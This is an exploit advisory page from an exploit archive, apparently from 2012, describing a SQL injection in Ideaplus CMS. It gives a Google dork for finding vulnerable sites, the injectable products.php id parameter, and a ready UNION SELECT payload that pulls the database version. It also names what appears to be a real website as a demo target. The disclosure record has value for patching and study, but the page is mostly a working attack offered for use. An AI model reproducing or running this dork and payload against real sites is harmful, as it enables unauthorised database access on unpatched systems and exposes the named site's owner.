Ideaplus CMS SQL Injection

2012.08.26
Credit: Crim3R
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:\"Powered by Ideaplus.\"

############# # Exploit Title: Ideaplus CMS Sql Injection Vulnerability # # Google Dork:intext:"Powered by Ideaplus." # # Date: 08/24/2012 # # Author: Crim3R # # Vendor Home : http://www.ideaplus.in/ # # Tested on: all # ################################################################################### $ $----Author will be not responsible for any damage---- $ ################################################################################### ======================================== http://target.com/products.php?id=[id][sql injection] sqli = +union+all+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22-- D3M0 : http://www.getsolmate.com/products.php?id=8 ===============Crim3R@Att.Net=========== $home = %00 thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir

References:

http://www.ideaplus.in/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top